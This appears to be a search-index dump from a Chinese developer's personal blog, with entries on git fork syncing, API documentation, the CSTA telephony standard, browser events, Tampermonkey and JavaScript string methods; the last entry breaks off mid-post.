(fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉取上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. 
remote: Compressing objects: 100% (4/4), done. remote: Total 4 (delta 2), reused 0 (delta 0) Unpacking objects: 100% (4/4), done. From http://gitlab.tt.cc:30000/fe/omp * [new branch] master -\u0026gt; upstream/master // 4 将upstream/master分支合并到master分支,由于我已经在master分支,此处就不再切换到master分支 ➜ omp git:(master) git merge upstream/master Updating 29c098c..6413803 Fast-forward README.md | 1 + 1 file changed, 1 insertion(+) // 5 查看一下,此次合并,本地有哪些更新 ➜ omp git:(master) git log -p // 6 然后将更新推送到仓库B ➜ omp git:(master) git push 3. 总结 通过上述操作,仓库B就同步了仓库A的代码。整体的逻辑就是将上游分支拉取到本地,然后合并到本地分支上。就这么简单。\n","permalink":"https://wdd.js.org/posts/2018/01/fork-sync-learn/","summary":"1. 前提说明 仓库A: http://gitlab.tt.cc:30000/fe/omp.git 仓库B: 仓库B fork自仓库A, 仓库B的地址是:http://gitlab.tt.cc:30000/wangdd/omp.git 某一时刻,仓库A更新了。仓库B需要同步上游分支的更新。\n2. 本地操作 // 1 查看远程分支 ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) // 2 添加一个远程同步的上游仓库 ➜ omp git:(master) git remote add upstream http://gitlab.tt.cc:30000/fe/omp.git ➜ omp git:(master) git remote -v origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (fetch) origin\thttp://gitlab.tt.cc:30000/wangdd/omp.git (push) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (fetch) upstream\thttp://gitlab.tt.cc:30000/fe/omp.git (push) // 3 拉取上游分支到本地,并且会被存储在一个新分支upstream/master ➜ omp git:(master) git fetch upstream remote: Counting objects: 4, done. 
remote: Compressing objects: 100% (4/4), done.","title":"git合并上游仓库即同步fork后的仓库"},{"content":" 个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国\n","permalink":"https://wdd.js.org/about/","summary":"个人简介 我是Eddie Wang!\n精通JavaScript/Node.js,现在的兴趣是学习go语言 精通VOIP相关技术栈:SIP/opensips/Freeswitch等等 精通VIM email: 1779706607@qq.com Github: github.com/wangduanduan 语雀: yuque.com/wangdd, 将不会更新 个人博客: wdd.js.org, 最新内容将会发布在wdd.js.org 最喜欢的美剧《黄石》 博客说明 博客取名为洞香春,灵感来自孙皓晖所著《大秦帝国》。\n洞香春大致在战国时代中期所在地:魏国安邑。\n战国时期,社会制度发生着巨大变化,工商业日益兴旺,出现了以白圭为首的一批巨贾商人,而位于魏国安邑的洞香春酒肆就是白氏家族创办的产业中最为著名的一个。\n洞香春以名士荟萃、谈论国事、交流思想而著称于当时列国","title":"关于我"},{"content":" 1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。因为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。common表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 
请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 异常处理 异常处理最小数据集\n状态码 说明 解决方案 举个栗子🌰:\n状态码 说明 解决方案 401 用户名密码错误 检查用户名密码是否正确 424 超过最大在线数量 请在控制台修改最大在线数量 之前我一直不想把解决方案加入异常处理的最小数据集,但是对于很多开发者来说,即使它知道424代表超过最大在线数量。如果你不告诉如果解决这个问题,那么他们可能就会直接来问你。所以最好能够一步到位,直接告诉他应该如何解决,这样省时省力。\n7. 如何组织? 7.1. 一个创建用户的例子:创建用户 1 请求示例\n// general POST http://www.testapi.com/api/user/vip/?token=abcdefg // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;] } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 2 路径与查询字符串参数模型\nPOST http://www.testapi.com/api/user/{userType}/?token={token}\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 token 是 认证令牌 3 请求体参数模型\n名称 是否必须 说明 name 是 用户名。4-50个字符 age 否 年龄 like 否 爱好。最多20个 4 响应体参数模型\n名称 说明 id 用户id 5 异常处理\n状态码 说明 解决方案 401 token过期 请重新申请token 424 超过最大在创建人数 请在控制台修改最大创建人数 7.2. 这样组织的原因 请求示例: 请求示例放在第一位的原因是,要用最快的方式告诉开发者,这个接口应该如何请求 路径与查询字符串参数模型: 使用mustache包裹参数 请求体参数模型:如果没有请求体,可以不写 响应体参数模型: 异常处理 8. 
文档提供的形式 文档建议由一下两种形式,在线文档,pdf文档。\n在线文档 更新方便 易于随时阅读 易于查找 pdf文档 内容表现始终如一,不依赖文档阅读器 文档只读,不会被轻易修改 其中由于是面对第三方开发者,公开的在线文档必须提供;由于某些特殊的原因,可能需要提供文件形式的文档,建议提供pdf文档。当然,以下的文档形式是非常不建议提供的:\nword文档 markdown文档 word文档和markdown文档有以下缺点:\n文档的表现形式非常依赖文档查看器:各个版本的word文档对word的表现形式差异很大,可能在你的电脑上内容表现很好的文档,到别人的电脑上就会一团乱麻;另外markdown文件也是如此。而且markdown中引入文件只能依靠图片链接,如果文档中含有图片,很可能会出现图片丢失的情况。 文档无法只读:文档无法只读,就有可能会被第三方开发者在不经意间修改,那么文档就无法保证其准确性了。 总结一下,文档形式的要点:\n只读性:保证文档不会被开发者轻易修改 一致性:保证文档在不同设备,不同文档查看器上内容表现始终如一 易于版本管理:文档即软件(DAAS: Document as a Software),一般意义上说软件 = 数据 + 算法, 但是我认为文档也是一种组成软件的重要形式。既然软件需要版本管理,文档的版本管理也是比不可少的。 ","permalink":"https://wdd.js.org/posts/2018/01/how-to-write-better-api-docs/","summary":"1. HTTP携带信息的方式 url headers body: 包括请求体,响应体 2. 分离通用信息 一般来说,headers里的信息都是通用的,可以提前说明,作为默认参数\n3. 路径中的参数表达式 URL中参数表达式使用{}的形式,参数包裹在大括号之中{paramName}\n例如:\n/api/user/{userId} /api/user/{userType}?age={age}\u0026amp;gender={gender} 4. 数据模型定义 数据模型定义包括:\n路径与查询字符串参数模型 请求体参数模型 响应体参数模型 数据模型的最小数据集:\n名称 是否必须 说明 “最小数据集”(MDS)是指通过收集最少的数据,较好地掌握一个研究对象所具有的特点或一件事情、一份工作所处的状态,其核心是针对被观察的对象建立起一套精简实用的数据指标。最小数据集的概念起源于美国的医疗领域。最小数据集的产生源于信息交换的需要,就好比上下级质量技术监督部门之间、企业与质量技术监督部门之间、质量技术监督部门与社会公众之间都存在着信息交换的需求。\n一些文档里可能会加入字段的类型,但是我认为这是没必要的。以为HTTP传输的数据往往都需要序列化,大部分数据类型都是字符串。一些特殊的类型,例如枚举类型的字符串,可以在说明里描述。\n另外:数据模型非常建议使用表格来表现。\n举个栗子🌰:\n名称 是否必须 说明 userType 是 用户类型。commom表示普通用户,vip表示vip用户 age 否 用户年龄 gender 否 用户性别。1表示男,0表示女 5. 请求示例 // general POST http://www.testapi.com/api/user // request payload { \u0026#34;name\u0026#34;: \u0026#34;qianxun\u0026#34;, \u0026#34;age\u0026#34;: 14, \u0026#34;like\u0026#34;: [\u0026#34;music\u0026#34;, \u0026#34;reading\u0026#34;], \u0026#34;userType\u0026#34;: \u0026#34;vip\u0026#34; } // response { \u0026#34;id\u0026#34;: \u0026#34;asdkfjalsdkf\u0026#34; } 6. 
异常处理 异常处理最小数据集","title":"如何写好接口文档?"},{"content":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)\n","permalink":"https://wdd.js.org/posts/2018/01/ie11-without-devtool/","summary":"解决方法安装Windows7补丁:KB3008923; 下载地址: http://www.microsoft.com/en-us/download/details.aspx?id=45134 (32位) http://www.microsoft.com/zh-CN/download/details.aspx?id=45154 (64位)","title":"win7 ie11 开发者工具打开后一片空白"},{"content":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec. 02 发布 CSTA WSDL (ECMA-348) June 2004 June 2004: 发布对象模型 TR/88\nJune 2004: 发布 “Using CSTA for SIP Phone User Agents (uaCSTA)” TR/87\nJune 2004: 发布 “Application Session Services” (ECMA-354)\nJune 2005: 发布 “WS-Session: WSDL for ECMA-354”(ECMA-366)\nDecember 2005 : 发布 “Management Notification and Computing Function Services”\nDecember 2005 : Session Management, Event Notification, Amendements for ECMA- 348” (TR/90)\nDecember 2006 : Published new editions of ECMA-269, ECMA-323, ECMA-348\n4. CSTA 标准文档 5. CSTA 标准扩展 新的特性可以被加入标准通过发布新版本的标准 新的参数,新的值可以被加入通过发布新版本的标准 未来的新版本必须下向后兼容 具体的实施可以增加属性通过CSTA自带的扩展机制(e.g. ONS – One Number Service) 6. 
CSTA 操作模型 CSTA操作模型由计算域和转换域组成,是CSTA定义在两个域之间的接口 CSTA标准规定了消息(服务以及事件上报),还有与之相关的行为 计算域是CSTA程序的宿主环境,用来与转换域交互与控制 转换域 - CSTA模型提供抽象层,程序可以观测并控制的。转换渔包括一些对象例如CSTA呼叫,设备,链接。 7. CSTA 操作模型:呼叫,设备,链接 相关说明是的的的的\n8. 参考 CSTAoverview CSTA_introduction_and_overview ","permalink":"https://wdd.js.org/posts/2018/01/csta-call-model-overview/","summary":"1. 内容概要 CSTA协议与标准概述 CSTA OpenScape 语音架构概述 2. CSTA协议标准 2.1. 什么是CSTA ? CSTA:电脑支持通讯程序(Computer Supported TelecommunicationsApplications)\n基本的呼叫模型在1992建立,后来随着行业发展,呼叫模型也被加强和扩展,例如新的协议等等\nCSTA是一个应用层接口,用来监控呼叫,设备和网络\nCSTA创建了一个通讯程序的抽象层:\nCSTA并不依赖任何底层的信令协议 E.g.H.323,SIP,Analog,T1,ISDN,etc. CSTA并不要求用户必须使用某些设备 E.g.intelligentendpoints,low-function/stimulusdevices,SIPSignalingmodels-3PCC vs. Peer/Peer 适用不同的操作模式\n第三方呼叫控制 一方呼叫控制 CSTA的设计目标是为了提高各种CSTA实现之间的移植性\n规范化呼叫模型和行为 完成服务、事件定义 规范化标准 3. CSTA 标准的进化史 阶段1 (发布于 June ’92)\n40 特性, 66 页 (服务定义) 专注于呼叫控制 阶段2 (发布于 Dec. ’94)\n77 特性, 145 页 (服务定义) I/O \u0026amp; 语音单元服务, 更多呼叫控制服务 阶段3 - CSTA Phase II Features \u0026amp; versit CTI Technology\n发布于 Dec. ‘98 136 特性, 650 页 (服务定义) 作为ISO 标准发布于 July 2000 发布 CSTA XML (ECMA-323) June 2004 发布 “Using CSTA with Voice Browsers” (TR/85) Dec.","title":"CSTA 呼叫模型简介"},{"content":" 之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 
向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。\n","permalink":"https://wdd.js.org/posts/2018/01/how-to-get-jsorg-sub-domain/","summary":"之前我是使用wangduanduan.github.io作为我的博客地址,后来觉得麻烦,有把博客关了。最近有想去折腾折腾。 先看效果:wdd.js.org\n如果你不了解js.org可以看看我的这篇文章:一个值得所有前端开发者关注的网站js.org\n1. 前提 已经有了github pages的一个博客,并且博客中有内容,没有内容会审核不通过的。我第一次申请域名,就是因为内容太少而审核不通过。 2. 想好自己要什么域名? 比如你想要一个:wdd.js.org的域名,你先在浏览器里访问这个地址,看看有没有人用过,如果已经有人用过,那么你就只能想点其他的域名了。\n3. fork js.org的项目,添加自己的域名 1 fork https://github.com/js-org/dns.js.org 2 修改你fork后的仓库中的cnames_active.js文件,加上自己的一条域名,最好要按照字母顺序\n如下图所示,我在第1100行加入。注意,不要在该行后加任何注释。\n\u0026#34;wdd\u0026#34;: \u0026#34;wangduanduan.github.io\u0026#34;, 3 commit\n4. 加入CNAME文件 我是用hexo和next主题作为博客的模板。其中我在gh-pages分支写博客,然后部署到master分支。\n我在我的gh-pages分支的source目录下加入CNAME文件, 内容只有一行\nwdd.js.org 将博客再次部署好,如果CNAME生效的话,你已经无法从原来的地址访问:wangduanduan.github.io, 这个博客了。\n5. 向js.org项目发起pull-request 找到你fork后的项目,点击 new pull request, 向原来的项目发起请求。\n然后你可以在js-org/dns.js.org项目的pull requests看到你的请求,当这个请求被合并时,你就拥有了js.org的二级域名。","title":"组织在召唤:如何免费获取一个js.org的二级域名"},{"content":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 
当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4. navigator.sendBeacon 这个方法主要用于满足 统计和诊断代码 的需要,这些代码通常尝试在卸载(unload)文档之前向web服务器发送数据。过早的发送数据可能导致错过收集数据的机会。然而, 对于开发者来说保证在文档卸载期间发送数据一直是一个困难。因为用户代理通常会忽略在卸载事件处理器中产生的异步 XMLHttpRequest 。\n使用 sendBeacon() 方法,将会使用户代理在有机会时异步地向服务器发送数据,同时不会延迟页面的卸载或影响下一导航的载入性能。这就解决了提交分析数据时的所有的问题:使它可靠,异步并且不会影响下一页面的加载。此外,代码实际上还要比其他技术简单!\n注意:该方法在IE和safari没有实现\n使用场景:发送崩溃报告\nwindow.addEventListener(\u0026#39;unload\u0026#39;, logData, false); function logData() { navigator.sendBeacon(\u0026#34;/log\u0026#34;, analyticsData); } ","permalink":"https://wdd.js.org/posts/2018/01/browser-events/","summary":"1. visibilitychange事件 触发条件:浏览器标签页被隐藏或显示的时候会触发visibilitychange事件.\n使用场景:当标签页显示或者隐藏时,触发一些业务逻辑\ndocument.addEventListener(\u0026#34;visibilitychange\u0026#34;, function() { console.log( document.visibilityState ); }); 2. storage事件 触发条件:使用localStorage or sessionStorage存储或者修改某个本地存储时\n使用场景:标签页间通信\n// AB页面同源 // 在A 页面 window.addEventListener(\u0026#39;storage\u0026#39;, (e) =\u0026gt; {console.log(e)}) // 在B 页面,向120打个电话 localStorage.setItem(\u0026#39;makeCall\u0026#39;,\u0026#39;120\u0026#39;) // 然后可以在A页面间有输出, 可以看出A页面 收到了B页面的通知 ...key: \u0026#34;makeCall\u0026#34;, oldValue: \u0026#34;119\u0026#34;, newValue: \u0026#34;120\u0026#34;, ... 3. beforeunload事件 触发条件:当页面的资源将要卸载(及刷新或者关闭标签页前). 
当页面依然可见,并且该事件可以被取消只时\n使用场景:关闭或者刷新页面时弹窗确认,关闭页面时向后端发送报告等\nwindow.addEventListener(\u0026#34;beforeunload\u0026#34;, function (e) { var confirmationMessage = \u0026#34;\\o/\u0026#34;; e.returnValue = confirmationMessage; // Gecko, Trident, Chrome 34+ return confirmationMessage; // Gecko, WebKit, Chrome \u0026lt;34 }); 4.","title":"不常用却很有妙用的事件及方法"},{"content":" 当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行\n","permalink":"https://wdd.js.org/posts/2018/01/tampermonkey/","summary":"当你用浏览器访问某个网页时,你可曾想过,你看到的这个网页,实际上是属于你自己的。\n打个比喻:访问某个网站就好像是网购了一筐鸡蛋,鸡蛋虽然是养鸡场生产的,但是这个蛋我怎么吃,你养鸡场管不着。\n当然了,对于很多人来说,鸡蛋没有别的吃法,鸡蛋只能煮着吃。\n你可以看如下的页面:当你在某搜索引擎上搜索前端开发时\n大多数人看到的页面是这样的, 满屏的广告,满屏的推广,满屏的排名,满屏的中间地址跳转,满屏的流量劫持, 还有莆田系\n但是有些人的页面却是这样的:清晰,自然,链接直达,清水出芙蓉,天然去雕饰 这就是油猴子脚本干的事情, 当然,它能干的事情,远不止如此。它是齐天大圣孙悟空,有七十二变。\n1. 什么是油猴子脚本? Greasemonkey,简称GM,中文俗称为“油猴”,是Firefox的一个附加组件。它让用户安装一些脚本使大部分HTML为主的网页于用户端直接改变得更方便易用。随着Greasemonkey脚本常驻于浏览器,每次随着目的网页打开而自动做修改,使得运行脚本的用户印象深刻地享受其固定便利性。\nGreasemonkey可替网页加入些新功能(例如在亚马逊书店嵌入商品比价功能)、修正网页错误、组合来自不同网页的数据、或者数繁不及备载的其他功能。写的好的Greasemonkey脚本甚至可让其输出与被修改的页面集成得天衣无缝,像是原本网页里的一部分。 来自维基百科\n2. 如何安装油猴子插件? 
在google商店搜索Tampermonkey, 安装量最高的就是它。\n3. 如何写油猴子脚本? 油猴子脚本有个新建脚本页面,在此页面可以创建脚本。具体教程可以参考。\n中文 GreaseMonkey 用户脚本开发手册 GreaseMonkey(油猴子)脚本开发 深入浅出 Greasemonkey Greasemonkey Hacks/Getting Started 4. 如何使用他人的脚本? greasyfork网站提供很多脚本,它仿佛是代码界的github, 可以在该网站搜到很多有意思的脚本。\n5. 有哪些好用的脚本? 有哪些超神的油猴脚本?\n或者你可以在greasyfork网站查看一些下载量排行","title":"油猴子脚本 - 我的地盘我做主"},{"content":" 引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.1. 在C++中首次出现substr() 在c语言中,并没有出现substr或者substring方法。然而在1983,substr()方法已经出现在C++语言中了。然而这时候还没有出现substring, 所以可以见得:substr是stustring的老大哥\nstring substr (size_t pos = 0, size_t len = npos) const; 从C++的方法定义中可以看到, substr的参数是开始下标,以及字符串长度。\nstd::string str=\u0026#34;We think in generalities, but we live in details.\u0026#34;; std::string str2 = str.substr (3,5); // \u0026#34;think\u0026#34; 1.2. 在Java中首次出现substring() 距离substr()方法出现已经有了将近十年之隔,此间涌现一批后起之秀,如: Python, Ruby, VB之类,然而他们之中并没有stustring的基因,在Java的String类中,我们看到两个方法。从这两个方法之中我们可以看到:substring方法基本原型的参数是开始和结束的下标。\nString substring(int beginIndex) // 返回一个新的字符串,它是此字符串的一个子字符串。 String substring(int beginIndex, int endIndex) // 返回一个新字符串,它是此字符串的一个子字符串。 2. 
JavaScript的历史继承 1995年,网景公司招募了Brendan Eich,目的是将Scheme编程语言嵌入到Netscape Navigator中。在开始之前,Netscape Communications与Sun Microsystems公司合作,在Netscape Navigator中引入了更多的静态编程语言Java,以便与微软竞争用户采用Web技术和平台。网景公司决定,他们想创建的脚本语言将补充Java,并且应该有一个类似的语法,排除采用Perl,Python,TCL或Scheme等其他语言。为了捍卫对竞争性提案的JavaScript的想法,公司需要一个原型。 1995年5月,Eich在10天内写完。\n上帝用七天时间创造万物, Brendan Eich用10天时间创造了一门语言。或许用创造并不合适,因为JavaScript是站在了Perl,Python,TCL或Scheme等其他巨人的肩膀上而产生的。\nJavaScript并不像C那样出身名门,在贝尔实验室精心打造,但是JavaScript在往后的自然选择中,并没有因此萧条,反而借助于C,C++, Java, Perl,Python,TCL, Scheme优秀基因,进化出更加强大强大的生命力。\n因此可以想象,在10天之内,当Brendan Eich写到String的substr和substring方法时,或许他并没困惑着两个方法的参数应该如何设置,因为在C++和Java的实现中,已经有了类似的定义。 如果你了解历史,你就不会困惑现在。\n3. 所以,substr和substring究竟有什么不同? 如下图所示:substr和substring都接受两个参数,他们的第一个参数的含义是相同的,不同的是第二个参数。substr的第二个参数是到达结束点的距离,substring是结束的位置。\n4. 参考文献 维基百科:程式語言歷史 C++ std::string::substr JavaScript 如有不正确的地方,欢迎指正。\n","permalink":"https://wdd.js.org/posts/2018/01/substr-and-substring-history/","summary":"引子: 很多时候,当我要字符串截取时,我会想到substr和substring的方法,但是具体要怎么传参数时,我总是记不住。哪个应该传个字符串长度,哪个又应该传个开始和结尾的下标,如果我不去查查这两个函数,我始终不敢去使用它们。所以我总是觉得,这个两个方法名起的真是蹩脚。然而事实是这样的吗?\n看来是时候扒一扒这两个方法的历史了。\n1. 基因追本溯源 在编程语言的历史长河中,曾经出现过很多编程语言。然而大浪淘沙,铅华洗尽之后,很多早已折戟沉沙,有些却依旧光彩夺目。那么stubstr与substring的DNA究竟来自何处?\n1950与1960年代\n1954 - FORTRAN 1958 - LISP 1959 - COBOL 1964 - BASIC 1970 - Pascal 1967-1978:确立了基础范式\n1972 - C语言 1975 - Scheme 1978 - SQL (起先只是一种查询语言,扩充之后也具备了程序结构) 1980年代:增强、模块、性能\n1983 - C++ (就像有类别的C) 1988 - Tcl 1990年代:互联网时代\n1991 - Python 1991 - Visual Basic 1993 - Ruby 1995 - Java 1995 - Delphi (Object Pascal) 1995 - JavaScript 1995 - PHP 2009 - Go 2014 - Swift (编程语言) 1.","title":"追本溯源:substr与substring历史漫话"},{"content":"1. 情景再现 以前用nodejs写后端程序时,遇到Promise这个概念,这个东西好呀!不用谢一层一层回调,直接用类似于jQuery的连缀方式。后来遇到bluebird这个库,它就是Promise库中很有名的。我希望可以把Promise用在前端的ajax请求上,但是我不想又引入bluebird。后来发现,jquery本身就具有类似于Promise的东西。于是我就jquery的Promise写一些异步请求。\n2. 不堪回首 看看一看我以前写异步请求的方式\n// 函数定义 function sendRequest(req,successCallback,errorCallback){ $.ajax({ ... ... 
